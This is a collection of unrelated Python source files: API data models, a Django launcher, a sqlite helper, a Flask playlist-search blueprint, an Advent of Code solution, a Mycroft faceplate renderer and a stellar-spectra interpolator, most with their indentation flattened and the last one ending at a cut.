commitMessage: Optional[Message] = None
keepEmptyFolders: Optional[KeepEmptyFolders] = None
conflictResolution: Optional[ConflictResolution] = None
class MergePullRequestByFastForwardOutput(BaseModel):
pullRequest: Optional[PullRequest] = None
class MergePullRequestBySquashOutput(MergePullRequestByFastForwardOutput):
pass
class MergePullRequestBySquashInput(BaseModel):
pullRequestId: PullRequestId
repositoryName: RepositoryName
sourceCommitId: Optional[ObjectId] = None
conflictDetailLevel: Optional[ConflictDetailLevelTypeEnum] = None
conflictResolutionStrategy: Optional[ConflictResolutionStrategyTypeEnum] = None
commitMessage: Optional[Message] = None
authorName: Optional[Name] = None
email: Optional[Email] = None
keepEmptyFolders: Optional[KeepEmptyFolders] = None
conflictResolution: Optional[ConflictResolution] = None
class MergePullRequestByThreeWayOutput(MergePullRequestByFastForwardOutput):
pass
class MergePullRequestByThreeWayInput(BaseModel):
pullRequestId: PullRequestId
repositoryName: RepositoryName
sourceCommitId: Optional[ObjectId] = None
conflictDetailLevel: Optional[ConflictDetailLevelTypeEnum] = None
conflictResolutionStrategy: Optional[ConflictResolutionStrategyTypeEnum] = None
commitMessage: Optional[Message] = None
authorName: Optional[Name] = None
email: Optional[Email] = None
keepEmptyFolders: Optional[KeepEmptyFolders] = None
conflictResolution: Optional[ConflictResolution] = None
class PutRepositoryTriggersInput(BaseModel):
"""
Represents the input of a put repository triggers operation.
"""
repositoryName: RepositoryName
triggers: RepositoryTriggersList
class TestRepositoryTriggersInput(BaseModel):
"""
Represents the input of a test repository triggers operation.
"""
repositoryName: RepositoryName
triggers: RepositoryTriggersList
class UpdatePullRequestDescriptionOutput(CreatePullRequestOutput):
pass
class UpdatePullRequestStatusOutput(CreatePullRequestOutput):
pass
class UpdatePullRequestTitleOutput(CreatePullRequestOutput):
pass
class Conflicts(BaseModel):
__root__: List[Conflict]
class BatchDescribeMergeConflictsOutput(BaseModel):
conflicts: Conflicts
nextToken: Optional[NextToken] = None
errors: Optional[BatchDescribeMergeConflictsErrors] = None
destinationCommitId: ObjectId
sourceCommitId: ObjectId
baseCommitId: Optional[ObjectId] = None
|
#!h:\django~1\attend~1\myenv\scripts\python.exe
from django.core import management
if __name__ == "__main__":
management.execute_from_command_line()
|
import sqlite3
from sqlite3 import Error
class DBHelper:
    """Thin convenience wrapper around sqlite3.

    Each call opens a fresh connection: fetch() runs a query and returns all
    rows, execute() runs a statement and commits, and manipulate() runs a
    parameterized statement, commits, and returns the last inserted row id.
    """
def __init__(self, filedb='db/pythonsqlite3.db'):
self.filedb=filedb
def __connect__(self):
try:
self.con = sqlite3.connect(self.filedb)
self.cur = self.con.cursor()
except Error as e:
print(e)
def __disconnect__(self):
self.con.close()
def fetch(self, sql):
self.__connect__()
self.cur.execute(sql)
result = self.cur.fetchall()
self.__disconnect__()
return result
def execute(self, sql):
self.__connect__()
self.cur.execute(sql)
self.con.commit()
self.__disconnect__()
def manipulate(self, sql, task):
self.__connect__()
self.cur.execute(sql, task)
self.con.commit()
self.__disconnect__()
return self.cur.lastrowid
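# Example usage (illustrative only; assumes the db/ directory exists so sqlite3
# can create the database file, and that a simple `projects` table is wanted).
if __name__ == "__main__":
    db = DBHelper()
    db.execute("CREATE TABLE IF NOT EXISTS projects (id INTEGER PRIMARY KEY, name TEXT)")
    new_id = db.manipulate("INSERT INTO projects (name) VALUES (?)", ("demo",))
    print(new_id, db.fetch("SELECT * FROM projects"))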
|
# -*- coding: utf-8 -*-
from .abod import ABOD
from .cblof import CBLOF
from .combination import aom, moa, average, maximization
from .feature_bagging import FeatureBagging
from .hbos import HBOS
from .iforest import IForest
from .knn import KNN
from .lof import LOF
from .mcd import MCD
from .ocsvm import OCSVM
from .pca import PCA
__all__ = ['ABOD',
'CBLOF',
'aom', 'moa', 'average', 'maximization',
'FeatureBagging',
'HBOS',
'IForest',
'KNN',
'LOF',
'MCD',
'OCSVM',
'PCA']
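# Illustrative smoke test (an assumption, not part of pyod itself): fit one of
# the detectors re-exported above on random data and inspect its outputs.
if __name__ == "__main__":
    import numpy as np

    X_train = np.random.randn(200, 5)
    clf = KNN()                        # any detector above follows the same fit API
    clf.fit(X_train)
    print(clf.labels_[:10])            # binary labels: 0 = inlier, 1 = outlier
    print(clf.decision_scores_[:10])   # raw outlier scores on the training data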
|
import io
from setuptools import setup, find_packages
from sotabenchapi.version import __version__
name = "sotabenchapi"
author = "Robert Stojnic"
author_email = "hello@sotabench.com"
license = "Apache-2.0"
url = "https://sotabench.com"
description = (
"Easily benchmark Machine Learning models on selected tasks and datasets."
)
setup(
name=name,
version=__version__,
author=author,
author_email=author_email,
maintainer=author,
maintainer_email=author_email,
description=description,
long_description=io.open("README.md", "r", encoding="utf-8").read(),
long_description_content_type="text/markdown",
url=url,
platforms=["Windows", "POSIX", "MacOSX"],
license=license,
packages=find_packages(),
install_requires=io.open("requirements.txt").read().splitlines(),
entry_points="""
[console_scripts]
sb=sotabenchapi.__main__:cli
""",
)
|
# -*- coding: utf-8 -*-
"""
spotty_search.search.controllers
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Flask Blueprint for searching
"""
from flask import Blueprint, jsonify, Response
from spotty_search.api import spot
from spotty_search.search import fuzzy_search
# init Flask Blueprint at /search/ directory
search = Blueprint('search', __name__, url_prefix='/search')
@search.route('/', methods=['GET'])
def index() -> Response:
return jsonify({'status': 'success'})
@search.route("/<query>")
def searcher(query: str) -> Response:
results = fuzzy_search(query, spot.playlists_and_tracks)
return jsonify(
{
playlist_id: {
'score': score,
'playlist': spot.playlists[playlist_id]
}
for (score, playlist_id, data) in results
}
)
@search.route("/playlists")
def playlists() -> Response:
""" Returns JSON of user's playlists
"""
return jsonify(spot.playlists)
@search.route("/playlist/<id>")
def playlist(id: str) -> Response:
""" Returns JSON of `id` playlist's info
"""
return jsonify(spot.playlists[id])
@search.route("/playlist/<id>/tracks")
def playlist_tracks(id: str) -> Response:
""" Returns tracks in `id` playlist
"""
return jsonify([track for track in spot.playlists[id].tracks])
@search.route("playlistsandtracks")
def playlists_and_tracks() -> Response:
""" Returns JSON with playlist id as key and tracks as elements
"""
return jsonify(spot.playlists_and_tracks)
"""
************************************
** **
** returning raw json from pyfy **
** **
************************************
"""
@search.route("old/playlists")
def old_playlists() -> Response:
""" Returns user's playlists
"""
return jsonify(spot.spt.user_playlists())
@search.route("old/playlist/<id>")
def old_playlist(id: str) -> Response:
""" Returns JSON of `id` playlist's info
"""
return jsonify(spot.spt.playlist_tracks(id))
@search.route("old/playlist/<id>/tracks")
def old_playlist_tracks(id: str) -> Response:
""" Returns tracks in `id` playlist
"""
return jsonify([
track['track']['name']
for track
in spot.spt.playlist_tracks(id)['items']
])
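# Minimal wiring sketch (an assumption, not part of the original app): register
# the blueprint on a bare Flask app so the routes above can be exercised
# locally. The real project presumably does this in its application factory.
if __name__ == "__main__":
    from flask import Flask

    app = Flask(__name__)
    app.register_blueprint(search)   # serves /search/, /search/<query>, ...
    app.run(debug=True)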
|
def part_1(data):
chart = [([c for c in line] + [' '] * 200)[:200] for line in data]
x, y = chart[0].index('|'), 0
dx, dy = 0, 1
letters = []
while True:
x, y = x+dx, y+dy
symbol = chart[y][x]
if symbol == ' ':
return "".join(letters)
elif symbol.isalpha():
letters.append(symbol)
elif symbol == '+':
for n in get_neighbours((x, y)):
if n[0] == x - dx or n[1] == y - dy:
continue
if chart[n[1]][n[0]] == '|' or chart[n[1]][n[0]] == '-':
dx, dy = n[0] - x, n[1] - y
break
def part_2(data):
chart = [([c for c in line] + [' ']*200)[:200] for line in data]
x, y = chart[0].index('|'), 0
dx, dy = 0, 1
steps = 0
while True:
steps += 1
x, y = x + dx, y + dy
symbol = chart[y][x]
if symbol == ' ':
return steps
elif symbol == '+':
for n in get_neighbours((x, y)):
if n[0] == x - dx or n[1] == y - dy:
continue
if chart[n[1]][n[0]] == '|' or chart[n[1]][n[0]] == '-':
dx, dy = n[0] - x, n[1] - y
break
def get_neighbours(point):
return [(point[0] + dx, point[1] + dy) for dx in range(-1, 2)
for dy in range(-1, 2)
if (dx == 0) ^ (dy == 0)]
if __name__ == '__main__':
with open('day_19_input.txt') as f:
inp = f.readlines()
print("Part 1 answer: " + str(part_1(inp)))
print("Part 2 answer: " + str(part_2(inp)))
|
from datetime import time
from mongoengine import DoesNotExist
from pytz import UTC
from models import ChatPeriodicTask
from exceptions import SocialCreditError
from .options import TransactionLimitChatOptions, TransactionLimitProfileOptions
from .signals import *
from .periodic import *
DEFAULT_TIME = time(hour=17, tzinfo=UTC)
DEFAULT_LIMIT = 10
HELP_TEXT = '''Implements a daily transaction limit: each profile can rank only a limited number of messages per day.
The default limit is {limit}; it resets every day at {time}:00 UTC.'''
# TODO add following to help text, when set_plugin_option goes public
# Available options:
# * limit - changes transaction limit for everyone in the chat. Applies, when limit is reset.'''
def enable(chat):
try:
options = chat.plugin_options.get(plugin_name='transaction_limit')
except DoesNotExist:
pass
else:
raise SocialCreditError('Plugin is already enabled.')
chat_options = TransactionLimitChatOptions(plugin_name='transaction_limit', limit=DEFAULT_LIMIT)
profiles = chat.get_profiles()
chat.plugin_options.append(chat_options)
chat.plugin_options.save()
for profile in profiles:
profile_option = TransactionLimitProfileOptions(plugin_name='transaction_limit', transactions_left=DEFAULT_LIMIT)
profile.plugin_options.append(profile_option)
profile.plugin_options.save()
ChatPeriodicTask(
chat=chat,
plugin_name='transaction_limit',
module='reset_transactions',
time=DEFAULT_TIME,
).save()
def disable(chat):
try:
options = chat.plugin_options.get(plugin_name='transaction_limit')
except DoesNotExist:
raise SocialCreditError('Plugin is already disabled.')
profiles = chat.get_profiles()
chat.plugin_options.remove(options)
chat.plugin_options.save()
for profile in profiles:
profile_options = profile.plugin_options.get(plugin_name='transaction_limit')
profile.plugin_options.remove(profile_options)
profile.plugin_options.save()
ChatPeriodicTask.objects.get(
chat=chat,
plugin_name='transaction_limit',
module='reset_transactions',
).delete()
def get_help():
return HELP_TEXT, {'time': DEFAULT_TIME.hour, 'limit': DEFAULT_LIMIT}
|
# Copyright 2021, Mycroft AI Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Render the time on an Arduino faceplate, such as on the Mark I."""
ALARM_INDICATOR = "CIAACA"
CHARACTER_WIDTH = 4
FACEPLATE_WIDTH = 32
NINE_COLUMN_BLANK = "JIAAAAAAAAAAAAAAAAAA"
NO_ALARM_INDICATOR = "CIAAAA"
SEVEN_COLUMN_BLANK = "HIAAAAAAAAAAAAAA"
class FaceplateRenderer:
"""Display data on a Mark I or device with similar faceplate."""
def __init__(self, enclosure, display_time: str):
self.enclosure = enclosure
self.display_time = display_time
# Map characters to the display encoding for a Mark 1
# (4x8 except colon, which is 2x8)
self.character_codes = {
':': 'CIICAA',
'0': 'EIMHEEMHAA',
'1': 'EIIEMHAEAA',
'2': 'EIEHEFMFAA',
'3': 'EIEFEFMHAA',
'4': 'EIMBABMHAA',
'5': 'EIMFEFEHAA',
'6': 'EIMHEFEHAA',
'7': 'EIEAEAMHAA',
'8': 'EIMHEFMHAA',
'9': 'EIMBEBMHAA',
}
def render_time(self, alarm_is_set: bool):
"""Draw the time centered on the faceplate and an alarm indicator.
Args:
alarm_is_set: Indicates if the alarm skill has one or more active alarms
"""
self._render_left_padding()
self._render_time_characters()
self._render_alarm_indicator(alarm_is_set)
self._render_right_padding()
def _render_left_padding(self):
"""Draw blanks to the left of the time.
For 4-character times (e.g. 1:23), draw 9 blank columns. For 5-character
times (e.g. 12:34) draw 7 blank columns.
"""
if len(self.display_time) == 4:
image_code = NINE_COLUMN_BLANK
else:
image_code = SEVEN_COLUMN_BLANK
self.enclosure.mouth_display(img_code=image_code, refresh=False)
def _render_time_characters(self):
"""Draw the time, centered on display.
Calculate the x_coordinate that represents where the first character of the
time should be drawn for the time to appear centered. Then draw the characters
starting from that point.
"""
time_width = (CHARACTER_WIDTH * len(self.display_time)) - 2
x_coordinate = (FACEPLATE_WIDTH - time_width) / 2
for character in self.display_time:
self.enclosure.mouth_display(
img_code=self.character_codes[character], x=x_coordinate, refresh=False
)
x_coordinate += 2 if character == ":" else 4
def _render_right_padding(self):
"""Draw blanks to the right of the time.
For 4-character times (e.g. 1:23), draw 9 blank columns. For 5-character
times (e.g. 12:34) draw 7 blank columns.
"""
if len(self.display_time) == 4:
image_code = NINE_COLUMN_BLANK
x_coordinate = 22
else:
image_code = SEVEN_COLUMN_BLANK
x_coordinate = 24
self.enclosure.mouth_display(img_code=image_code, x=x_coordinate, refresh=False)
def _render_alarm_indicator(self, alarm_is_set: bool):
"""Show a dot in the upper-left corner of the faceplate if an alarm is set.
Args:
alarm_is_set: indicates whether or not the alarm skill has active alarms.
"""
if alarm_is_set:
image_code = ALARM_INDICATOR
else:
image_code = NO_ALARM_INDICATOR
self.enclosure.mouth_display(img_code=image_code, x=29, refresh=False)
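# Illustrative usage sketch (not from the original skill): the real `enclosure`
# is Mycroft's enclosure API; a stand-in that just records mouth_display()
# calls is assumed here, purely to show how render_time() composes padding,
# digits, and the alarm indicator.
if __name__ == "__main__":
    class _FakeEnclosure:
        def mouth_display(self, img_code="", x=0, y=0, refresh=True):
            print(f"mouth_display(img_code={img_code!r}, x={x})")

    renderer = FaceplateRenderer(_FakeEnclosure(), "12:34")
    renderer.render_time(alarm_is_set=True)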
|
# encoding: utf-8
"""
@author: zeming li
@contact: zengarden2009@gmail.com
@file: __init__.py.py
"""
if __name__ == '__main__':
pass
|
""" Lejeune interpolator is basically a linear interpolator for a Lejeune grid
based spectral library.
This is the simplest interpolator but most commonly used.
It takes care of boundary conditions by imposing limits to extrapolation on a
given grid.
"""
import numpy as np
from .interpolator import BaseInterpolator
def __det3x3__(a):
""" compute the 3x3 determinant of an array
Hard coded equations are 8 times faster than np.linalg.det for a matrix 3x3
Parameters
----------
a: ndarray, shape=(3,3), dtype=float
array matrix
Returns
-------
val: float
determinant of a
"""
val = +a[0] * (a[4] * a[8] - a[7] * a[5])
val += -a[1] * (a[3] * a[8] - a[6] * a[5])
val += +a[2] * (a[3] * a[7] - a[6] * a[4])
return val
def __interp__(T0, g0, T,g, dT_max=0.1, eps=1e-6):
"""
Interpolation of the (T,g) grid at fixed Z
Translated from Pegase.2 fortran version
(this may not be pythonic though)
Note: preference is always given to the temperature over
the gravity when needed.
Parameters
----------
T0: float
log(Teff) to obtain
g0: float
log(g) to obtain
T: float
log(Teff) of the grid
g: float
log(g) of the grid
dT_max: float, optional
If, T2 (resp. T1) is too far from T compared to T1 (resp. T2), i2
(resp. i1) is not used. (see below for namings)
eps: float
temperature sensitivity under which points are considered to have
the same temperature
Returns
-------
idx: ndarray, dtype=int, size=4
4 star indexes
w: ndarray, dtype=float, size=4
4 associated weights
..note::
if index is -1, this means the point is rejected and the associated
weight is 0.
Naming conventions
------------------
i1 = index of the star with temperature > T and gravity > g.
Among all such stars, one chooses the one minimizing
|Delta T|+kappa*|Delta g|.
If no star with temperature > T and gravity > g exists, i1 = -1
i2 = index of the star with temperature > T and gravity < g.
i3 = index of the star with temperature < T and gravity > g.
i4 = index of the star with temperature < T and gravity < g.
g
/|\
| i3 |
| | i1
| ----x------
| | i2
| i4 |
|__________\ T
/
"""
kappa = 0.1
idx = np.arange(len(g))
deltag = g - g0
deltaT = T - T0
dist = kappa * abs(deltag) + abs(deltaT)
if dist.min() == 0:
return np.array((dist.argmin(),-1,-1,-1)), np.array((1.,0.,0.,0.))
# Looking for i_{1..4}
ind_dT = deltaT >= 0
ind_dg = deltag >= 0
# i1
ind = (ind_dT & ind_dg)
if True in ind:
i1 = idx[ind][dist[ind].argmin()]
else:
i1 = -1
# i2
ind = (ind_dT & ~ind_dg)
if True in ind:
i2 = idx[ind][dist[ind].argmin()]
else:
i2 = -1
# i3
ind = (~ind_dT & ind_dg)
if True in ind:
i3 = idx[ind][dist[ind].argmin()]
else:
i3 = -1
# i4
ind = (~ind_dT & ~ind_dg)
if True in ind:
i4 = idx[ind][dist[ind].argmin()]
else:
i4 = -1
# checking integrity
if ( (i1 < 0) & (i2 < 0) & (i3 < 0) & (i4 < 0) ):
raise ValueError("Interp. Error, could not find appropriate knots")
T1 = T[i1]
T2 = T[i2]
T3 = T[i3]
T4 = T[i4]
g1 = g[i1]
g2 = g[i2]
g3 = g[i3]
g4 = g[i4]
# If, T2 (resp. T1) is too far from T compared to T1
# (resp. T2), i2 (resp. i1) is not used.
# The same for i3 and i4.
if ( (i1 > 0) & (i2 > 0) ):
if (T1 < T2 - dT_max):
i2 = -1
elif (T2 < T1 - dT_max):
i1 = -1
if ( (i3 > 0) & (i4 > 0) ):
if (T3 > T4 + dT_max):
i4 = -1
elif (T4 > T3 + dT_max):
i3 = -1
if ( (i1 < 0) & (i2 < 0) & (i3 < 0) & (i4 < 0) ):
raise ValueError("Interp. Error, could not find appropriate knots")
# Interpolation in the (T, g) plane between the used points
# (at least 1, at most 4).
# Code "0110" means that i1 = i4 = 0, i2 /=0 and i3 /= 0.
#
# Note: preference is always given to the temperature over
# the gravity when needed.
if (i1 < 0):
if (i2 < 0):
if (i3 < 0):
if (i4 < 0):
# # 0000
raise ValueError("Error") # should not be possible
else: # 0001
alpha1 = 0.
alpha2 = 0.
alpha3 = 0.
alpha4 = 1.
# endif
elif (i4 < 0): # 0010
alpha1 = 0.
alpha2 = 0.
alpha3 = 1.
alpha4 = 0.
else: # 0011
alpha1 = 0.
alpha2 = 0.
if ( abs(T3 - T4) < eps ):
if (g3 == g4):
alpha3 = 0.5
else:
alpha3 = (g0 - g4) / (g3 - g4)
# endif
alpha4 = 1. - alpha3
else:
if (T3 > T4):
alpha3 = 1.
alpha4 = 0.
i4 = -1
else:
alpha3 = 0.
i3 = -1
alpha4 = 1.
# endif
# endif
# endif
elif (i3 < 0):
if (i4 < 0):
# # 0100
alpha1 = 0.
alpha2 = 1.
alpha3 = 0.
alpha4 = 0.
else: # 0101
alpha1 = 0.
if (T2 == T4):
alpha2 = 0.5
else:
alpha2 = (T0 - T4) / (T2 - T4)
# endif
alpha3 = 0.
alpha4 = 1. - alpha2
# endif
elif (i4 < 0): # 0110
alpha1 = 0.
if (T2 == T3):
alpha2 = 0.5
else:
alpha2 = (T0 - T3) / (T2 - T3)
# endif
alpha3 = 1. - alpha2
alpha4 = 0.
else: # 0111
# Assume that (T, g) is within the triangle i
# formed by the three points.
mat0 = np.asarray([
[ T2, T3, T4 ],
[ g2, g3, g4 ],
[ 1., 1., 1. ] ])
mat2 = np.asarray([
[ T0, T3, T4 ],
[ g0, g3, g4 ],
[ 1., 1., 1.] ])
mat3 = np.asarray([
[ T2, T0, T4 ],
[ g2, g0, g4 ],
[ 1., 1., 1.] ])
mat4 = np.asarray([
[ T2, T3, T0 ],
[ g2, g3, g0 ],
[ 1., 1., 1. ] ])
det0 = __det3x3__(mat0.ravel())
det2 = __det3x3__(mat2.ravel())
det3 = __det3x3__(mat3.ravel())
det4 = __det3x3__(mat4.ravel())
alpha1 = 0.
alpha2 = det2 / det0
alpha3 = det3 / det0
alpha4 = det4 / det0
# If (T, g) is outside the triangle formed
# by the three used points use only two points.
if ((alpha2 < 0.) | (alpha2 > 1. ) | (alpha3 < 0.) | (alpha3 > 1.) |
(alpha4 < 0.) | (alpha4 > 1. ) ):
alpha1 = 0.
if (T2 == T3):
alpha2 = 0.5
else:
alpha2 = (T0 - T3) / (T2 - T3)
# endif
alpha3 = 1. - alpha2
alpha4 = 0.
i4 = -1
# endif
# endif
elif (i2 < 0):
if (i3 < 0):
if (i4 < 0):
# # 1000
alpha1 = 1.
alpha2 = 0.
alpha3 = 0.
alpha4 = 0.
else: # 1001
if (T1 == T4):
alpha1 = 0.5
else:
alpha1 = (T0 - T4) / (T1 - T4)
# endif
alpha2 = 0.
alpha3 = 0.
alpha4 = 1. - alpha1
# endif
elif (i4 < 0): # 1010
if (T1 == T3):
alpha1 = 0.5
else:
alpha1 = (T0 - T3) / (T1 - T3)
# endif
alpha2 = 0.
alpha3 = 1. - alpha1
alpha4 = 0.
else: # 1011
# Assume that (T, g) is within the triangle formed by the three points.
mat0 = np.asarray([
[ T1, T3, T4 ],
[ g1, g3, g4 ],
[ 1., 1., 1.] ])
mat1 = np.asarray([
[ T0, T3, T4 ],
[ g0, g3, g4 ],
[ 1., 1., 1.] ])
mat3 = np.asarray([
[ T1, T0, T4 ],
[ g1, g0, g4 ],
[ 1., 1., 1.] ])
mat4 = np.asarray([
[ T1, T3, T0 ],
[ g1, g3, g0 ],
[ 1., 1., 1.] ])
det0 = __det3x3__(mat0.ravel())
det1 = __det3x3__(mat1.ravel())
det3 = __det3x3__(mat3.ravel())
det4 = __det3x3__(mat4.ravel())
alpha1 = det1 / det0
alpha2 = 0.
alpha3 = det3 / det0
alpha4 = det4 / det0
# If (T, g) is outside the triangle formed by the three used points,
# use only two points.
if ((alpha1 < 0.) | (alpha1 > 1.) | (alpha3 < 0.) | (alpha3 > 1.) | (alpha4 < 0.) | (alpha4 > 1.) ):
if (T1 == T4):
alpha1 = 0.5
else:
alpha1 = (T0 - T4) / (T1 - T4)
# endif
alpha2 = 0.
alpha3 = 0.
i3 = -1
alpha4 = 1. - alpha1
# endif
# endif
elif (i3 < 0):
if (i4 < 0):
# # 1100
if (abs(T1 - T2) < eps):
if (g1 == g2):
alpha1 = 0.5
else:
alpha1 = (g0 - g2) / (g1 - g2)
# endif
alpha2 = 1. - alpha1
else:
if (T1 < T2):
alpha1 = 1.
alpha2 = 0.
i2 = -1
else:
alpha1 = 0.
i1 = -1
alpha2 = 1.
# endif
# endif
alpha3 = 0.
alpha4 = 0.
else: # 1101
# Assume that (T, g) is within the triangle formed by the three points.
mat0 = np.asarray([
[ T1, T2, T4 ],
[ g1, g2, g4 ],
[ 1., 1., 1.] ])
mat1 = np.asarray([
[ T0, T2, T4 ],
[ g0, g2, g4 ],
[ 1., 1., 1.] ])
mat2 = np.asarray([
[ T1, T0, T4 ],
[ g1, g0, g4 ],
[ 1., 1., 1.] ])
mat4 = np.asarray([
[ T1, T2, T0 ],
[ g1, g2, g0 ],
[ 1., 1., 1. ] ])
det0 = __det3x3__(mat0.ravel())
det1 = __det3x3__(mat1.ravel())
det2 = __det3x3__(mat2.ravel())
det4 = __det3x3__(mat4.ravel())
alpha1 = det1 / det0
alpha2 = det2 / det0
alpha3 = 0.
alpha4 = det4 / det0
# If (T, g) is outside the triangle formed by the three used points,
# use only two points.
if ((alpha1 < 0.) | (alpha1 > 1.) | (alpha2 < 0.) | (alpha2 > 1.) | (alpha4 < 0.) | (alpha4 > 1.) ):
if (T1 == T4):
alpha1 = 0.5
else:
alpha1 = (T0 - T4) / (T1 - T4)
# endif
alpha2 = 0.
i2 = -1
alpha3 = 0.
alpha4 = 1. - alpha1
# endif
# endif
elif (i4 < 0):
# # 1110
# Assume that (T, g) is within the triangle formed by the three points.
mat0 = np.asarray([
[ T1, T2, T3 ],
[ g1, g2, g3 ],
[ 1., 1., 1.] ])
mat1 = np.asarray([
[ T0, T2, T3 ],
[ g0, g2, g3 ],
[ 1., 1., 1.] ])
mat2 = np.asarray([
[ T1, T0, T3 ],
[ g1, g0, g3 ],
[ 1., 1., 1.] ])
mat3 = np.asarray([
[ T1, T2, T0 ],
[ g1, g2, g0 ],
[ 1., 1., 1.] ])
det0 = __det3x3__(mat0.ravel())
det1 = __det3x3__(mat1.ravel())
det2 = __det3x3__(mat2.ravel())
det3 = __det3x3__(mat3.ravel())
alpha1 = det1 / det0
alpha2 = det2 / det0
alpha3 = det3 / det0
alpha4 = 0.
# If (T, g) is outside the triangle formed by the three used points,
# use only two points.
if ((alpha1 < 0.) | (alpha1 > 1.) | (alpha2 < 0.) | (alpha2 > 1.) | (alpha3 < 0.) | (alpha3 > 1.) ):
alpha1 = 0.
i1 = -1
if (T2 == T3):
alpha2 = 0.5
else:
alpha2 = (T0 - T3) / (T2 - T3)
# endif
alpha3 = 1. - alpha2
alpha4 = 0.
# endif
# endif
# All four points used.
if ( (i3 >= 0) & (i4 >= 0) & (i1 >= 0) & (i2 >= 0) ):
if (T1 != T3):
alpha = (T0 - T3) / (T1 - T3)
else:
alpha = 0.5
# endif
if (T2 != T4):
beta = (T0 - T4) / (T2 - T4)
else:
beta = 0.5
# endif
gprim = alpha * g1 + (1 - alpha) * g3
gsec = beta * g2 + (1 - beta ) * g4
if (gprim != gsec):
gamma = ( g0 - gsec ) / ( gprim - gsec )
else:
gamma = 0.5
# endif
alpha1 = alpha * gamma
alpha2 = beta * ( 1 - gamma )
alpha3 = ( 1 - alpha ) * gamma
alpha4 = ( 1 - beta ) * ( 1 - gamma )
# endif
return np.asarray((i1, i2, i3, i4)), np.asarray((alpha1, alpha2, alpha3, alpha4))
'''
class LejeuneInterpolator(BaseInterpolator):
""" Interpolation for grid based on the Lejeune library definition
The interpolation is N-D linear in log-temperature, log-gravity, and linear
in metallicity Z. Preference is always given to the temperature over the
gravity when needed.
This version is translated from Pegase
Attributes
----------
dT_max: float, optional
If, T2 (resp. T1) is too far from T compared to T1 (resp. T2), i2
(resp. i1) is not used. (see below for namings)
eps: float
temperature sensitivity under which points are considered to have
the same temperature
"""
def __init__(self, osl, dT_max=0.1, eps=1e-6, *args, **kwargs):
BaseInterpolator.__init__(self, osl, *args, **kwargs)
self.dlogT_max = dT_max
self.eps = eps
self.osl = osl
def interp(self, aps, weights=None, **kwargs):
return self.interp_other(aps, self.osl.spectra, weights=weights, **kwargs)
def interp_other(self, aps, other, weights=None, **kwargs):
# get osl data
osl_logT, osl_logg, osl_logZ = self.osl.get_interpolation_data().T[:3]
grid_logZ = np.unique(osl_logZ)
if np.ndim(other) < 2:
values = np.atleast_2d([other]).T
else:
values = np.atleast_2d(other)
# params
library_index = np.arange(len(osl_logT), dtype=int)
_aps = np.atleast_2d(aps)
if weights is None:
_weights = np.ones(len(_aps), dtype=float)
elif np.ndim(weights) == 0:
_weights = np.ones(len(_aps), dtype=float) * weights
else:
_weights = weights
final_values = []
for current_aps, current_weight in zip(np.atleast_2d(aps), _weights):
logT, logg, logZ = current_aps
# logZ = np.log10(Z)
# find Zsup and Zinf
where = np.searchsorted(grid_logZ, logZ)
if where >=0:
logZinf = grid_logZ[where]
else:
raise ValueError("Metallicity extrapolation")
if abs(logZinf - logZ) < 1e-4:
# exact match no need to interpolate twice.
select = (abs(logZinf - osl_logZ) < 1e-4)
# call Pegase interpolation scheme
# Interpolation of the (logT, logg) grid at fixed Z from pegase.2
# it returns the knots'indices from the input data and their weights, resp.
# the final result is then the weighted sum.
indices, alphas = __interp__(logT, logg,
osl_logT[select], osl_logg[select],
dT_max=self.dlogT_max, eps=self.eps)
# indices are for the selection
# if indices[k] = -1, then one corner is rejected
data_indices = library_index[select][indices[indices >= 0]]
data_weights = alphas[indices >= 0]
spectrum = np.sum(values[data_indices] * data_weights[:, None], axis=0)
# store the weighted sum * the input requested weight
final_values.append(spectrum * current_weight)
else:
logZsup = grid_logZ[where + 1]
# interpolate within each (therefore calling interp with Zinf, Zsup, resp.)
# then linearly interpolate between logZ values.
inf_spectrum = self.interp_other((logT, logg, logZinf), values, weights=current_weight, **kwargs)
sup_spectrum = self.interp_other((logT, logg, logZsup), values, weights=current_weight, **kwargs)
spectrum = inf_spectrum * (logZ - logZinf) / (logZsup - logZinf) + sup_spectrum * (logZsup - logZ) / (logZsup - logZinf)
final_values.append(spectrum)
return np.squeeze(final_values)
'''
class LejeuneInterpolator(BaseInterpolator):
""" Interpolation for grid based on the Lejeune library definition
The interpolation is N-D linear in log-temperature, log-gravity, and linear
in metallicity Z. Preference is always given to the temperature over the
gravity when needed.
This version is translated from Pegase
Attributes
----------
dT_max: float, optional
If, T2 (resp. T1) is too far from T compared to T1 (resp. T2), i2
(resp. i1) is not used. (see below for namings)
eps: float
temperature sensitivity under which points are considered to have
the same temperature
"""
def __init__(self, osl, dT_max=0.1, eps=1e-6, *args, **kwargs):
BaseInterpolator.__init__(self, osl, *args, **kwargs)
self.dlogT_max = dT_max
self.eps = eps
self.osl = osl
def _osl_interp_weights(self, osl, T0, g0, Z0, dT_max=0.1, eps=1e-6):
""" Interpolation of the T,g grid
Interpolate on the grid and returns star indices and associated weights,
and Z.
3 to 12 stars are returned.
It calls _interp_, but reduce the output to the relevant stars.
Parameters
----------
T0: float
log(Teff) to obtain
g0: float
log(g) to obtain
Z0: float
metallicity to obtain
dT_max: float, optional
If, T2 (resp. T1) is too far from T compared to T1 (resp. T2), i2
(resp. i1) is not used. (see below for namings)
eps: float
temperature sensitivity under which points are considered to have
the same temperature
Returns
-------
idx: ndarray, dtype=int, size=4
4 star indexes
w: ndarray, dtype=float, size=4
4 associated weights
Returns 3 to 12 star indexes and associated weights
"""
# interpolation must be by construction from logT, logg, Z
# logZ could be an alternative.
osl_logT, osl_logg, osl_logZ = self.osl.get_interpolation_data().T[:3]
_Z = 10 ** osl_logZ
_Zv = np.unique(_Z)
_T = np.asarray(osl_logT, dtype=np.double)
_g = np.asarray(osl_logg, dtype=np.double)
bZ_m = True in (abs(_Zv - Z0) < 1e-28) # Z_match bool
r = np.where((_Zv < Z0))[0]
Z_inf = _Zv[r.max()] if len(r) > 0 else -1.
r = np.where((_Zv > Z0))[0]
Z_sup = _Zv[r.min()] if len(r) > 0 else -1.
index = np.zeros(4 * 3) - 1
weights = np.zeros(4 * 3)
Z = np.zeros(4 * 3)
if (bZ_m):
ind = np.where((abs(_Z - Z0) < 1e-28))
